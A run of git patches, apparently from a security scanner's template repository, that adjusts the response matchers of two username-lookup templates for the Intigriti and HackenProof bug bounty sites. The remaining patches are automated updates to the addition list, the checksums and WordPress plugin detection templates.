Subject: [PATCH 0364/1090] updated matchers

---
 http/osint/intigriti.yaml | 20 +++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)

diff --git a/http/osint/intigriti.yaml b/http/osint/intigriti.yaml
index d90ba6a26f..89cc8d8099 100644
--- a/http/osint/intigriti.yaml
+++ b/http/osint/intigriti.yaml
@@ -3,27 +3,37 @@ id: intigriti
 info:
   name: Intigriti User Name Information - Detect
   author: philippedelteil
-  description: Intigriti user name information check was conducted.
   severity: info
+  description: Intigriti user name information check was conducted.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cvss-score: 0.0
     cwe-id: CWE-200
-  tags: osint,osint-tech,intigriti
   metadata:
     max-request: 1
+  tags: osint,osint-tech,intigriti
+
 self-contained: true
 http:
   - method: GET
     path:
       - "https://app.intigriti.com/profile/{{user}}"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+      - type: word
+        part: body
+        words:
+          - 'Rep. all time'
+          - '{{user}} - Intigriti'
+        condition: and
+
       - type: word
         part: body
         words:
           - "We didn't find what you're looking for"
         negative: true
+
+      - type: status
+        status:
+          - 200

From 58b813b6f56e3d8c27bf6110a8e18c7e2c973159 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 14:43:02 +0530
Subject: [PATCH 0365/1090] updated matchers

---
 http/osint/hackenproof.yaml | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/http/osint/hackenproof.yaml b/http/osint/hackenproof.yaml
index 1520580d80..fd2e859428 100644
--- a/http/osint/hackenproof.yaml
+++ b/http/osint/hackenproof.yaml
@@ -3,16 +3,15 @@ id: hackenproof
 info:
   name: Hackenproof User Name Information - Detect
   author: philippedelteil
-  description: Hackenproof user name information check was conducted. (https://hackenproof.com/).
-
   severity: info
+  description: Hackenproof user name information check was conducted.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cvss-score: 0.0
     cwe-id: CWE-200
-  tags: osint,osint-tech,hackenproof
   metadata:
     max-request: 1
+  tags: osint,osint-tech,hackenproof
 
 self-contained: true
 http:
@@ -22,6 +21,14 @@ http:
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - 'Check out {{user}} on HackenProof'
+          - 'Member since'
+        condition: and
+        case-insensitive: true
+
       - type: status
         status:
           - 200

From 87035a6e0e03fdc5ca03b7605a838c46afa51b47 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:22:00 +0000
Subject: [PATCH 0366/1090] Auto Generated New Template Addition List [Fri Sep
 15 10:22:00 UTC 2023] :robot:

---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.new-additions b/.new-additions
index 9f50d0af28..a05aa05fc3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -4,4 +4,6 @@ http/cves/2023/CVE-2023-39676.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
 http/exposed-panels/symantec/symantec-phishing-panel.yaml
 http/misconfiguration/gitlab/gitlab-public-registration.yaml
+http/osint/hackenproof.yaml
+http/osint/intigriti.yaml
 http/vulnerabilities/other/phpldapadmin-xss.yaml

From ed982f156ff5b51e85a26408c1d2d000e684bead Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:22:14 +0000
Subject: [PATCH 0367/1090] Auto Generated New Template Addition List [Fri Sep
 15 10:22:14 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index a05aa05fc3..ec0b0b65e4 100644
--- a/.new-additions
+++ b/.new-additions
@@ -6,4 +6,5 @@ http/exposed-panels/symantec/symantec-phishing-panel.yaml
 http/misconfiguration/gitlab/gitlab-public-registration.yaml
 http/osint/hackenproof.yaml
 http/osint/intigriti.yaml
+http/osint/yeswehack.yaml
 http/vulnerabilities/other/phpldapadmin-xss.yaml

From 1987867b06a133dee2925cc36b518cd7f6b7e961 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:22:16 +0000
Subject: [PATCH 0368/1090] Auto Generated Templates Checksum [Fri Sep 15
 10:22:16 UTC 2023] :robot:

---
 templates-checksum.txt | 29 +++++++++++++++--------------
 1 file changed, 15 insertions(+), 14 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index f5544f57b0..08891d7bf7 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -367,7 +367,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d
 helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e
 helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6
 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f
-helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222
+helpers/wordpress/plugins/all-in-one-seo-pack.txt:344b5cffb3c634589e6cd6bc3a7f10de5354fa39
 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
 helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
@@ -412,11 +412,11 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036
 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae
 helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/easy-wp-smtp.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
-helpers/wordpress/plugins/elementor.txt:62e1d33b9ac0a52b10c98ee1ecbade79436203f4
+helpers/wordpress/plugins/elementor.txt:d7000d57dbd531816c092550998a14eb2e689620
 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f
-helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f
+helpers/wordpress/plugins/enable-media-replace.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd
 helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6
-helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:bd82642fcdbb4b8deecdafa23ae0de55f979eb2e
+helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:59c6b6abae4f481ef509a10767fab68cb112f327
 helpers/wordpress/plugins/ewww-image-optimizer.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3
 helpers/wordpress/plugins/facebook-for-woocommerce.txt:98f2be81dca85d834586d9f281c4849476edffb2
 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614
@@ -431,7 +431,7 @@ helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe
 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:9e4d99fe9543741fae861b8214e954feb69c7c36
 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8
 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31
-helpers/wordpress/plugins/google-listings-and-ads.txt:89941265e418c7729912b574c9b29eff77c5b172
+helpers/wordpress/plugins/google-listings-and-ads.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
 helpers/wordpress/plugins/google-site-kit.txt:1ea542c4af360053318955743814486207238bc6
 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61
 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
@@ -452,7 +452,7 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa86
 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3
 helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c
 helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c
-helpers/wordpress/plugins/kadence-blocks.txt:76352622a937abb841a04340015012a42290add0
+helpers/wordpress/plugins/kadence-blocks.txt:4ddf3a1e0a6b9d9c05f57b23f658e1113368aa4f
 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa
 helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d
 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8
@@ -471,10 +471,10 @@ helpers/wordpress/plugins/megamenu.txt:157d4751f6fc258dd2244da6c46a957ae64e4258
 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f
 helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee
 helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0
-helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2
+helpers/wordpress/plugins/newsletter.txt:96a20c8da2810939fa60d2647f8273c2251ad539
 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655
 helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f
-helpers/wordpress/plugins/ninja-forms.txt:2aee11d7a9ddfedc94e7fb36aefcf9174d34d88b
+helpers/wordpress/plugins/ninja-forms.txt:94f9b21809da9e412d33671b039ff794206b6902
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
@@ -496,14 +496,14 @@ helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea3
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12
-helpers/wordpress/plugins/redux-framework.txt:344b5cffb3c634589e6cd6bc3a7f10de5354fa39
+helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c380227
 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4
 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/seo-by-rank-math.txt:a43557d2fb8277db824695f3e651c31ef604fac4
 helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa
 helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4
 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
-helpers/wordpress/plugins/shortpixel-image-optimiser.txt:4f019608acb19092704e77b812587f75a4baed71
+helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e
 helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
@@ -536,8 +536,8 @@ helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675
 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6d698b8798743668826bd
 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3
-helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b
-helpers/wordpress/plugins/woocommerce-payments.txt:f96eaecad7005b860741ecc59d4835f7428015fd
+helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2
+helpers/wordpress/plugins/woocommerce-payments.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
 helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3
@@ -4975,6 +4975,7 @@ http/osint/graphicssocial-mastodon-instance.yaml:57675d84a15c8805332424a36fa2319
 http/osint/gravatar.yaml:16555e3b203620010170332f821abd0ed87ec8d6
 http/osint/gumroad.yaml:56fc3592b466ba031bd220cea1e2c8c865915ac9
 http/osint/hackaday.yaml:6e6028b5d94224d6ca44e454451994579abb80cf
+http/osint/hackenproof.yaml:31b5aa62f5d099d349ee5960b3e1c62c76cf9152
 http/osint/hacker-news.yaml:542d6fdf2770b2d7ca5265d63b40a2241a67f982
 http/osint/hackerearth.yaml:1b0deb177591f795681bada1ccf9b22cd4c422e2
 http/osint/hackernoon.yaml:87f62f751549e86b0856dff9384588dccff39c47
@@ -6020,7 +6021,7 @@ http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18a
 http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
 http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
 http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
 http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
@@ -7065,7 +7066,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:0bf645923ff27bf08f9c0d2e6caa0208241d6fbe
+templates-checksum.txt:0cdab5caf3361dd7f5cfc22b8c038f40305537be
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From c9d33aa3d91c5c987c3eb03a47ab85d05b17389a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:23:09 +0000
Subject: [PATCH 0370/1090] Auto Generated New Template Addition List [Fri Sep
 15 10:23:09 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index ec0b0b65e4..83947102d5 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
+http/exposed-panels/satis-repository.yaml
 http/exposed-panels/symantec/symantec-phishing-panel.yaml
 http/misconfiguration/gitlab/gitlab-public-registration.yaml
 http/osint/hackenproof.yaml

From 4e62c7dbacfd574c71478e6b72e76e13d826a974 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:23:22 +0000
Subject: [PATCH 0371/1090] Auto Generated Templates Checksum [Fri Sep 15
 10:23:22 UTC 2023] :robot:

---
 templates-checksum.txt | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 08891d7bf7..22fde98036 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -3488,6 +3488,7 @@ http/exposed-panels/sap-netweaver-portal.yaml:f5abd3f37e740ac3433d5f13eab52b6c76
 http/exposed-panels/sap-successfactors-detect.yaml:660ea820be2891306d8d0c36f7ff7fdd15db248b
 http/exposed-panels/sapfiori-panel.yaml:90f32ca73d9b6d1d0dba5274f910dc9939175927
 http/exposed-panels/sas-login-panel.yaml:7c26018108182a28ca28aa6bdce9c9ed28627876
+http/exposed-panels/satis-repository.yaml:b34c7bd3ff6c5917a75b80eb8344aefd721934e4
 http/exposed-panels/sauter-login.yaml:a099e30c29df03b502f89ffe0c935783c34c87fe
 http/exposed-panels/sauter-moduwebvision-panel.yaml:b83910490f24a5c81ba7058dc742e7fbe8b38ada
 http/exposed-panels/scriptcase/scriptcase-panel.yaml:9479327ed20d4d3d49a22a89830db9da1246d3e3
@@ -5018,6 +5019,7 @@ http/osint/instructables.yaml:1f8aeb1664023e75872a7bb68406b44774704508
 http/osint/internet-archive-account.yaml:158256956c1e1fbf15d73f69256056871a9599a4
 http/osint/internet-archive-user-search.yaml:43c6d65acd4105ec8087d297bd209150ebf130fe
 http/osint/interpals.yaml:850bed45d931324ddfd52f955bbcacf0312245ea
+http/osint/intigriti.yaml:c5b1683d2a7a32cdfe025080a554d1250a2bb094
 http/osint/ismygirl.yaml:9dfe04d48d22fb51faaec430b41838e0e294a3ae
 http/osint/issuu.yaml:9ea79ddaeddcc3c2bdcdcaf70b40c0409d3bd994
 http/osint/itchio.yaml:d89d77035bc7179563dcc728d6dd4d917c3a832f
@@ -5381,6 +5383,7 @@ http/osint/yahoo-japan-auction.yaml:d53aa495b13d8fea65e5e9faa4b80a3fa3bc32ca
 http/osint/yapishu.yaml:43944e69c44fe5fe892a6839e4f4be8622cbcccf
 http/osint/yazawaj.yaml:32b0b3c7c931e4ff7141dff9c3ae0d0b3adf7476
 http/osint/yelp.yaml:9dc5a992a0d67fc38d36d30e56df900435041145
+http/osint/yeswehack.yaml:7fdf8a6caa7b2d4cdb42560e61665dbd86bf0b11
 http/osint/youpic.yaml:d2508873dcb9696e92a07c84eeb7040bea652bc3
 http/osint/youtube.yaml:750f3a2f095ac306cc075fe4cbf3312961b4ed6d
 http/osint/zatrybipl.yaml:c7068397c7973f0a38d35db56d90c77a1349f8aa
@@ -7066,7 +7069,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:0cdab5caf3361dd7f5cfc22b8c038f40305537be
+templates-checksum.txt:be239784cf99d84efb743ee28fe22c7241f9255a
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From b8429611560f3879a91922260f2ff23673985589 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 10:23:42 +0000
Subject: [PATCH 0372/1090] TemplateMan Update [Fri Sep 15 10:23:42 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 http/technologies/wordpress/plugins/loginpress.yaml              | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
